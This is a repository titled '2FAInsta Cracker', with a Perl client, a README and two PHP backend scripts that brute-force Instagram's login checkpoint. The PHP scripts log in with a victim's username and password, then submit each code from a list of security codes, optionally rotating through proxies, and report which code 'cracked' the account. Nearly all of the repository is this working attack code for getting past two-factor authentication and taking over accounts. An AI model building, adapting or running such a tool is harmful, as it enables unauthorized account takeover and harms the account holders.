├── Cracker.pl
├── README.md
└── source-code
    ├── normal.php
    └── proxy.php


/Cracker.pl:
--------------------------------------------------------------------------------
  1 | use LWP::UserAgent;
  2 | system('cls');
  3 | system('color 1e');
  4 | print '
  5 | ###################
  6 | # Coded By 1337r00t
  7 | ###################
  8 | ...........................................................................
  9 | .%%%%....%%%%%%..%%%%%%..%%%%%%.......%%%%%%\...../%%%\..../%%%\....%%%%%%.
 10 | ...%%........%%......%%.....(%/.......%%....%)...%:...:%..%:...:%.....%%...
 11 | ...%%....%%%%%%..%%%%%%....(%/........%%%%)%.}...%:...:%..%:...:%.....%%...
 12 | ...%%........%%......%%...(%/.........%%...\%)...%:...:%..%:...:%.....%%...
 13 | .%%%%%%..%%%%%%..%%%%%%..(%...........%%....\%)...\%%%/....\%%%/......%%...
 14 | ...........................................................................
 15 | \n';
 16 | print qq(
 17 | #============================#
 18 | #     2FAInsta Cracker       #
 19 | #     C0ded by 1337r00t      #
 20 | #    Instagram: 1337r00t     #
 21 | #============================#\n
 22 | \n1 - With Proxy\n2 - Without Proxy\n\n> );
 23 | $do = <STDIN>;
 24 | chomp($do);
 25 | system('cls');
 26 | #######################################################################################
 27 | if ($do == 1){
 28 | 	print qq(
 29 | 	Enter Proxys File:
 30 | 	> );
 31 | 	$proxylist=<STDIN>;
 32 | 	chomp($proxylist);
 33 | 	open (PROXYFILE, "<$proxylist") || die "[-] Can't Found The List Of Proxys !";
 34 | 	@PROXYS = <PROXYFILE>;
 35 | 	close PROXYFILE;
 36 | 	
 37 | 	print qq(
 38 | 	Enter Username :
 39 | 	> );
 40 | 	$user=<STDIN>;
 41 | 	chomp($user);
 42 | 	
 43 | 	print qq(
 44 | 	Enter Password :
 45 | 	> );
 46 | 	$pass=<STDIN>;
 47 | 	chomp($pass);
 48 | 	
 49 | 	print qq(
 50 | 	Enter Security Codes File:
 51 | 	> );
 52 | 	$codelist=<STDIN>;
 53 | 	chomp($codelist);
 54 | 	open (CODEFILE, "<$codelist") || die "[-] Can't Found The List Of Codes !";
 55 | 	@CODES = <CODEFILE>;
 56 | 	close CODEFILE;
 57 | 	######################
 58 | 	foreach $code (@CODES) {
 59 | 	chomp $code;
 60 | 		foreach $proxy (@PROXYS) {
 61 | 		chomp $proxy;
 62 | 			$ua = LWP::UserAgent->new();
 63 | 			$request = HTTP::Request->new(GET => "http://www.mughniagent.co.uk/instagram/proxy.php?proxy=$proxy&user=$user&pass=$pass&code=$code");
 64 | 			$response = $ua->request($request);
 65 | 			$output = $response->content();
 66 | 			print "$output\n";
 67 | 		}
 68 | 	}
 69 | }
 70 | ##################################################################################
 71 | if ($do == 2){
 72 | 
 73 | print qq(
 74 | Enter Username :
 75 | > );
 76 | $user2=<STDIN>;
 77 | chomp($user2);
 78 | 
 79 | print qq(
 80 | Enter Password :
 81 | > );
 82 | $pass2=<STDIN>;
 83 | chomp($pass2);
 84 | 
 85 | print qq(
 86 | Enter Security Codes File:
 87 | > );
 88 | $codelist2=<STDIN>;
 89 | chomp($codelist2);
 90 | open (CODEFILE2, "<$codelist2") || die "[-] Can't Found The List Of Codes !";
 91 | @CODES2 = <CODEFILE2>;
 92 | close CODEFILE2;
 93 | ######################
 94 | foreach $code2 (@CODES2) {
 95 | chomp $code2;
 96 | 	$ua2 = LWP::UserAgent->new();
 97 | 	$request2 = HTTP::Request->new(GET => "http://www.mughniagent.co.uk/instagram/normal.php?user=$user2&pass=$pass2&code=$code2");
 98 | 	$response2 = $ua2->request($request2);
 99 | 	$output2 = $response2->content();
100 | 	print "$output2\n";
101 | }
102 | }
103 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # 2FAInsta-Cracker
 2 | 
 3 | --------------------
 4 | Brute Force Checkpoint Instagram [CrackerTOOL] v1.0
 5 | ---------------
 6 | Coded By 1337r00t
 7 | --------------
 8 | 
 9 | My Instagram : 1337r00t
10 | My Twitter : 1337r00t
11 | 


--------------------------------------------------------------------------------
/source-code/normal.php:
--------------------------------------------------------------------------------
 1 | <?
 2 | // http://www.mughniagent.co.uk/instagram/normal.php?mid=[]&user=[]&pass=[]&code=[]
 3 | $username2 = $_GET['user'];
 4 | $password2 = $_GET['pass'];
 5 | $code2 = $_GET['code'];
 6 | $ch2 = curl_init(); 
 7 | curl_setopt($ch2, CURLOPT_URL, "https://www.instagram.com/accounts/login/ajax/");
 8 | curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
 9 | curl_setopt($ch2, CURLOPT_FOLLOWLOCATION, 1);
10 | curl_setopt($ch2, CURLOPT_HTTPHEADER, array(
11 |     'Host: www.instagram.com',
12 |     'X-CSRFToken: F8Q8qKQogom1tedr1z1TeEPfR7aWFGt1',
13 |     'X-Instagram-AJAX: 1',
14 |     'X-Requested-With: XMLHttpRequest',
15 |     'Referer: https://www.instagram.com/',
16 |     'Cookie: csrftoken=F8Q8qKQogom1tedr1z1TeEPfR7aWFGt1;'
17 |     ));
18 | curl_setopt($ch2, CURLOPT_POSTFIELDS, "username=$username2&password=$password2");
19 | curl_setopt($ch2, CURLOPT_HEADER, 1);
20 | $check2 = curl_exec($ch2);
21 | if(eregi('checkpoint', $check2))
22 | {
23 | $starturl2 = explode('"checkpoint_url": "' , $check2 );
24 | $endurl2 = explode('"' , $starturl2[1] );
25 | $uri2 = $endurl2[0];
26 | 
27 | $url2 = "https://www.instagram.com$uri2";
28 | $instagram2 = curl_init(); 
29 | curl_setopt($instagram2, CURLOPT_URL, $url2);
30 | curl_setopt($instagram2, CURLOPT_RETURNTRANSFER, 1);
31 | curl_setopt($instagram2, CURLOPT_FOLLOWLOCATION, 1);
32 | curl_setopt($instagram2, CURLOPT_HTTPHEADER, array(
33 |     'X-CSRFToken: F8Q8qKQogom1tedr1z1TeEPfR7aWFGt1',
34 |     'X-Instagram-AJAX: 1',
35 |     "Referer: $url2",
36 |     "Cookie: mid=WWy-QQAEAAE56m6cNeNkhixRJvwg; csrftoken=F8Q8qKQogom1tedr1z1TeEPfR7aWFGt1;"
37 |     ));
38 | curl_setopt($instagram2, CURLOPT_POSTFIELDS, "security_code=$code2");
39 | curl_setopt($instagram2, CURLOPT_HEADER, 1);
40 | $response2 = curl_exec($instagram2);
41 | if(eregi('"location": "https://www.instagram.com/"', $response2))
42 | 	{
43 | 		echo "Cracked -> ${code2}";
44 | 	}
45 | 	else
46 | 	{
47 | 		if(eregi("Please check the code we sent you and try again.", $response2))
48 | 		{
49 | 			echo "Failed -> ${code2}";
50 | 		}
51 | 		else
52 | 		{
53 | 			if(eregi("This field is required.", $response2))
54 | 			{
55 | 				echo "MID : WWy-QQAEAAE56m6cNeNkhixRJvwg fail";
56 | 			}
57 | 			else
58 | 			{
59 | 				if(eregi("Please wait a few minutes before you try again.", $response2))
60 | 				{
61 | 					echo "Please wait [Blocked]->${code2}";
62 | 				}
63 | 				else
64 | 				{
65 | 					if(eregi("You've entered the code incorrectly too many times.", $response2))
66 | 					{
67 | 						echo "Blocked Dude :( [${code2}]";
68 | 					}
69 | 					else
70 | 					{
71 | 						echo $response2 ;
72 | 					}
73 | 				}
74 | 			}
75 | 		}
76 | 	}
77 | curl_close($instagram2);
78 | }
79 | else
80 | {
81 | 	echo "Where is 2FA Man ???";
82 | }
83 | curl_close($ch2);
84 | ?>
85 | 


--------------------------------------------------------------------------------
/source-code/proxy.php:
--------------------------------------------------------------------------------
 1 | <?
 2 | // http://www.mughniagent.co.uk/instagram/proxy.php?proxy=[]&mid=[]&user=[]&pass=[]&code=[]
 3 | $proxy = $_GET['proxy'];
 4 | $username = $_GET['user'];
 5 | $password = $_GET['pass'];
 6 | $code = $_GET['code'];
 7 | $ch = curl_init(); 
 8 | curl_setopt($ch, CURLOPT_URL, "https://www.instagram.com/accounts/login/ajax/"); 
 9 | curl_setopt($ch, CURLOPT_PROXY, $proxy);
10 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
11 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
12 | curl_setopt($ch, CURLOPT_HTTPHEADER, array(
13 |     'Host: www.instagram.com',
14 |     'X-CSRFToken: F8Q8qKQogom1tedr1z1TeEPfR7aWFGt1',
15 |     'X-Instagram-AJAX: 1',
16 |     'X-Requested-With: XMLHttpRequest',
17 |     'Referer: https://www.instagram.com/',
18 |     'Cookie: csrftoken=F8Q8qKQogom1tedr1z1TeEPfR7aWFGt1;'
19 |     ));
20 | curl_setopt($ch, CURLOPT_POSTFIELDS, "username=$username&password=$password");
21 | curl_setopt($ch, CURLOPT_HEADER, 1);
22 | $check = curl_exec($ch);
23 | if(eregi('checkpoint', $check))
24 | {
25 | $starturl = explode('"checkpoint_url": "' , $check );
26 | $endurl = explode('"' , $starturl[1] );
27 | $uri = $endurl[0];
28 | $url = "https://www.instagram.com$uri";
29 | 
30 | $instagram = curl_init(); 
31 | curl_setopt($instagram, CURLOPT_URL, $url); 
32 | curl_setopt($instagram, CURLOPT_PROXY, $proxy);
33 | curl_setopt($instagram, CURLOPT_RETURNTRANSFER, 1);
34 | curl_setopt($instagram, CURLOPT_FOLLOWLOCATION, 1);
35 | curl_setopt($instagram, CURLOPT_HTTPHEADER, array(
36 |     'X-CSRFToken: F8Q8qKQogom1tedr1z1TeEPfR7aWFGt1',
37 |     'X-Instagram-AJAX: 1',
38 |     "Referer: $url",
39 |     "Cookie: mid=WWy-QQAEAAE56m6cNeNkhixRJvwg; csrftoken=F8Q8qKQogom1tedr1z1TeEPfR7aWFGt1;"
40 |     ));
41 | curl_setopt($instagram, CURLOPT_POSTFIELDS, "security_code=$code");
42 | curl_setopt($instagram, CURLOPT_HEADER, 1);
43 | $response = curl_exec($instagram);
44 | if(eregi('"location": "https://www.instagram.com/"', $response))
45 | 	{
46 | 		echo "Cracked -> ${code}";
47 | 	}
48 | 	else
49 | 	{
50 | 		if(eregi("Please check the code we sent you and try again.", $response))
51 | 		{
52 | 			echo "Failed -> ${code}";
53 | 		}
54 | 		else
55 | 		{
56 | 			if(eregi("This field is required.", $response))
57 | 			{
58 | 				echo "MID : WWy-QQAEAAE56m6cNeNkhixRJvwg fail";
59 | 			}
60 | 			else
61 | 			{
62 | 				if(eregi("Please wait a few minutes before you try again.", $response))
63 | 				{
64 | 					echo "Please wait [Blocked]->${code}";
65 | 				}
66 | 				else
67 | 				{
68 | 					if(eregi("You've entered the code incorrectly too many times.", $response))
69 | 					{
70 | 						echo "Blocked Dude :( [${code}]";
71 | 					}
72 | 					else
73 | 					{
74 | 						echo $response ;
75 | 					}
76 | 				}
77 | 			}
78 | 		}
79 | 	}
80 | curl_close($instagram);
81 | }
82 | else
83 | {
84 |  echo "where is 2FA Bro ???";
85 | }
86 | curl_close($ch);
87 | ?>
88 | 			}
89 | 		}
90 | 	}
91 | curl_close($instagram);
92 | ?>
93 | 


--------------------------------------------------------------------------------